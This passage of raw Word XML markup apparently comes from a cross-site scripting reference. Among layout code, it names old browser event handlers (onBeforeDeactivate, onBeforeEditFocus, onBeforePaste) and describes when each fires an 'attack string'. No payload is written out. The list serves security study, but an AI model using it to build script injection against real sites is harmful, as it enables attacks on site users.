        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>executes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>right</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>selection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>cut)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2263"/>
          <w:tab w:val="left" w:pos="2264"/>
        </w:tabs>
        <w:spacing w:before="161"/>
        <w:ind w:left="2263" w:hanging="1976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244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1111250" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1153" name="Group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1250" cy="116205"/>
                          <a:chOff x="1930" y="167"/>
                          <a:chExt cx="1750" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1154" name="Freeform 1156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1750" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3659 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1750"/>
                              <a:gd name="T2" fmla="+- 0 349 167"/>
                              <a:gd name="T3" fmla="*/ 349 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1750"/>
                              <a:gd name="T6" fmla="+- 0 349 167"/>
                              <a:gd name="T7" fmla="*/ 349 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1750"/>
                              <a:gd name="T10" fmla="+- 0 349 167"/>
                              <a:gd name="T11" fmla="*/ 349 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1750"/>
                              <a:gd name="T14" fmla="+- 0 328 167"/>
                              <a:gd name="T15" fmla="*/ 328 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1750"/>
                              <a:gd name="T18" fmla="+- 0 325 167"/>
                              <a:gd name="T19" fmla="*/ 325 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1750"/>
                              <a:gd name="T22" fmla="+- 0 188 167"/>
                              <a:gd name="T23" fmla="*/ 188 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1750"/>
                              <a:gd name="T26" fmla="+- 0 167 167"/>
                              <a:gd name="T27" fmla="*/ 167 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3659 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1750"/>
                              <a:gd name="T30" fmla="+- 0 167 167"/>
                              <a:gd name="T31" fmla="*/ 167 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3680 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1750"/>
                              <a:gd name="T34" fmla="+- 0 188 167"/>
                              <a:gd name="T35" fmla="*/ 188 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3680 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1750"/>
                              <a:gd name="T38" fmla="+- 0 328 167"/>
                              <a:gd name="T39" fmla="*/ 328 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3662 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1750"/>
                              <a:gd name="T42" fmla="+- 0 349 167"/>
                              <a:gd name="T43" fmla="*/ 349 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3659 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1750"/>
                              <a:gd name="T46" fmla="+- 0 349 167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50" h="183">
                                <a:moveTo>
                                  <a:pt x="172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729" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1750" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1750" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1732" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="172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" name="Text Box 115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175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onBeforeDeactivate()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54" o:spid="_x0000_s1278" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.35pt;width:87.5pt;height:9.15pt;z-index:-17644032;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,167" coordsize="175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">
                <v:shape id="Freeform 1156" o:spid="_x0000_s1279" style="position:absolute;left:1930;top:167;width:1750;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="175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2W58MA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS4vCMBC+L/gfwgje1kRxRatRRFiVvSw+8Dw0Y1ts&#10;JrXJtvXfbxYWvM3H95zlurOlaKj2hWMNo6ECQZw6U3Cm4XL+fJ+B8AHZYOmYNDzJw3rVe1tiYlzL&#10;R2pOIRMxhH2CGvIQqkRKn+Zk0Q9dRRy5m6sthgjrTJoa2xhuSzlWaiotFhwbcqxom1N6P/1YDbd2&#10;f/2aTlS4tGr33TzmxWO232o96HebBYhAXXiJ/90HE+ePPibw900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2W58MAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m1729,182l21,182r-3,l,161r,-3l,21,21,,1729,r21,21l1750,161r-18,21l1729,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1729,349;21,349;18,349;0,328;0,325;0,188;21,167;1729,167;1750,188;1750,328;1732,349;1729,349" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1155" o:spid="_x0000_s1280" type="#_x0000_t202" style="position:absolute;left:1930;top:167;width:175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3ioMMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9L/gfwgje1tQFZbcaRWQFQVis9eBxbMY2&#10;2ExqE7X++42wsLd5vM+ZLTpbizu13jhWMBomIIgLpw2XCg75+v0ThA/IGmvHpOBJHhbz3tsMU+0e&#10;nNF9H0oRQ9inqKAKoUml9EVFFv3QNcSRO7vWYoiwLaVu8RHDbS0/kmQiLRqODRU2tKqouOxvVsHy&#10;yNm3uf6cdtk5M3n+lfB2clFq0O+WUxCBuvAv/nNvdJw/Go/h9U08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3ioM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onBeforeDeactivate()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(fires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>right</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>after</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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activeElement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>changed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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current</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>object)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2179"/>
          <w:tab w:val="left" w:pos="2180"/>
        </w:tabs>
        <w:spacing w:line="333" w:lineRule="auto"/>
        <w:ind w:left="464" w:right="184" w:hanging="27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296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1057275" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1150" name="Group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7275" cy="116205"/>
                          <a:chOff x="1930" y="154"/>
                          <a:chExt cx="1665" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1151" name="Freeform 1153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1665" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3574 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1665"/>
                              <a:gd name="T2" fmla="+- 0 336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1665"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1665"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1665"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1665"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1665"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1665"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3574 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1665"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3595 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1665"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3595 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1665"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3577 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1665"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3574 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1665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665" h="183">
                                <a:moveTo>
                                  <a:pt x="164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644" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1665" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1665" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1647" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="164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" name="Text Box 115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166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onBeforeEditFocus()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51" o:spid="_x0000_s1281" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:83.25pt;height:9.15pt;z-index:-17643520;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154" coordsize="166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">
                <v:shape id="Freeform 1153" o:spid="_x0000_s1282" style="position:absolute;left:1930;top:154;width:1665;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="166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XPOMMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0PywhepG5SaAnRTZC22kK9mIrnITtm&#10;g9nZkN1q/PfdQsHbPN7nrMrRduJCg28dK0gXCQji2umWGwWH781jBsIHZI2dY1JwIw9l8TBZYa7d&#10;lfd0qUIjYgj7HBWYEPpcSl8bsugXrieO3MkNFkOEQyP1gNcYbjv5lCQv0mLLscFgT6+G6nP1YxXM&#10;7df2fZPdKtTzj935WJvwloxKzabjegki0Bju4n/3p47z0+cU/r6JJ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XPOMMAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m1644,182l21,182r-3,l,161r,-3l,21,21,,1644,r21,21l1665,161r-18,21l1644,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1644,336;21,336;18,336;0,315;0,312;0,175;21,154;1644,154;1665,175;1665,315;1647,336;1644,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1152" o:spid="_x0000_s1283" type="#_x0000_t202" style="position:absolute;left:1930;top:154;width:166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R61MMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/6HMII3TRUUrUaRRWFBWLZ2D3scm7EN&#10;NpNuk9X67zcLgrd5vM9Zbztbixu13jhWMBknIIgLpw2XCr7yw2gBwgdkjbVjUvAgD9tNv7fGVLs7&#10;Z3Q7hVLEEPYpKqhCaFIpfVGRRT92DXHkLq61GCJsS6lbvMdwW8tpksylRcOxocKG3ioqrqdfq2D3&#10;zdne/HycP7NLZvJ8mfBxflVqOOh2KxCBuvASP93vOs6fzKb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R61M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onBeforeEditFocus()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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(Fires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>contained</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>editable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>element</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>enters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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UI-activated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>state</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-36"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>editable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>container</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>selected)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842"/>
          <w:tab w:val="left" w:pos="1843"/>
        </w:tabs>
        <w:spacing w:before="86" w:line="319" w:lineRule="auto"/>
        <w:ind w:left="464" w:right="2363" w:hanging="27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347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58420</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="848995" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1147" name="Group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8995" cy="116205"/>
                          <a:chOff x="1930" y="92"/>
                          <a:chExt cx="1337" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1148" name="Freeform 1150"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="92"/>
                            <a:ext cx="1337" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3246 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1337"/>
                              <a:gd name="T2" fmla="+- 0 274 92"/>
                              <a:gd name="T3" fmla="*/ 274 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1337"/>
                              <a:gd name="T6" fmla="+- 0 274 92"/>
                              <a:gd name="T7" fmla="*/ 274 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1337"/>
                              <a:gd name="T10" fmla="+- 0 274 92"/>
                              <a:gd name="T11" fmla="*/ 274 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1337"/>
                              <a:gd name="T14" fmla="+- 0 253 92"/>
                              <a:gd name="T15" fmla="*/ 253 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1337"/>
                              <a:gd name="T18" fmla="+- 0 250 92"/>
                              <a:gd name="T19" fmla="*/ 250 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1337"/>
                              <a:gd name="T22" fmla="+- 0 113 92"/>
                              <a:gd name="T23" fmla="*/ 113 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1337"/>
                              <a:gd name="T26" fmla="+- 0 92 92"/>
                              <a:gd name="T27" fmla="*/ 92 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3246 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1337"/>
                              <a:gd name="T30" fmla="+- 0 92 92"/>
                              <a:gd name="T31" fmla="*/ 92 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3267 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1337"/>
                              <a:gd name="T34" fmla="+- 0 113 92"/>
                              <a:gd name="T35" fmla="*/ 113 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3267 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1337"/>
                              <a:gd name="T38" fmla="+- 0 253 92"/>
                              <a:gd name="T39" fmla="*/ 253 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3249 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1337"/>
                              <a:gd name="T42" fmla="+- 0 274 92"/>
                              <a:gd name="T43" fmla="*/ 274 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3246 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1337"/>
                              <a:gd name="T46" fmla="+- 0 274 92"/>
                              <a:gd name="T47" fmla="*/ 27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7" h="183">
                                <a:moveTo>
                                  <a:pt x="131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16" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1319" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="131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" name="Text Box 114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92"/>
                            <a:ext cx="133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onBeforePaste()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48" o:spid="_x0000_s1284" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:4.6pt;width:66.85pt;height:9.15pt;z-index:-17643008;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,92" coordsize="133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">
                <v:shape id="Freeform 1150" o:spid="_x0000_s1285" style="position:absolute;left:1930;top:92;width:1337;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="133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0voMkA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPT0vDQBDF74LfYRmhF7GbFLEldlu0f0DwUBqL4G3I&#10;jslqdjZkt23qp3cOgrcZ3pv3fjNfDr5VJ+qjC2wgH2egiKtgHdcGDm/buxmomJAttoHJwIUiLBfX&#10;V3MsbDjznk5lqpWEcCzQQJNSV2gdq4Y8xnHoiEX7DL3HJGtfa9vjWcJ9qydZ9qA9OpaGBjtaNVR9&#10;l0dvYPPxfsjd1+swrVflzs0utz/PazJmdDM8PYJKNKR/89/1ixX8/F5w5RsZQS9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f0voMkAAADdAAAADwAAAAAAAAAAAAAAAACYAgAA&#10;ZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAI4DAAAAAA==&#10;" path="m1316,182l21,182r-3,l,161r,-3l,21,21,,1316,r21,21l1337,161r-18,21l1316,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1316,274;21,274;18,274;0,253;0,250;0,113;21,92;1316,92;1337,113;1337,253;1319,274;1316,274" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1149" o:spid="_x0000_s1286" type="#_x0000_t202" style="position:absolute;left:1930;top:92;width:133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l+eMQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywje6sYiUqMbEWmhIBRjevA4ZifJ&#10;YnY2zW41/vuuUOhtHu9z1pvBtuJKvTeOFcymCQji0mnDtYKv4v35FYQPyBpbx6TgTh422ehpjal2&#10;N87pegy1iCHsU1TQhNClUvqyIYt+6jriyFWutxgi7Gupe7zFcNvKlyRZSIuGY0ODHe0aKi/HH6tg&#10;e+L8zXx/ng95lZuiWCa8X1yUmoyH7QpEoCH8i//cHzrOn82X8Pgmn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pfnj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onBeforePaste()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776256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>5175885</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>58420</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1118870" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1144" name="Group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8870" cy="116205"/>
                          <a:chOff x="8151" y="92"/>
                          <a:chExt cx="1762" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1145" name="Freeform 1147"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="8151" y="92"/>
                            <a:ext cx="1762" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 9892 8151"/>
                              <a:gd name="T1" fmla="*/ T0 w 1762"/>
                              <a:gd name="T2" fmla="+- 0 274 92"/>
                              <a:gd name="T3" fmla="*/ 274 h 183"/>
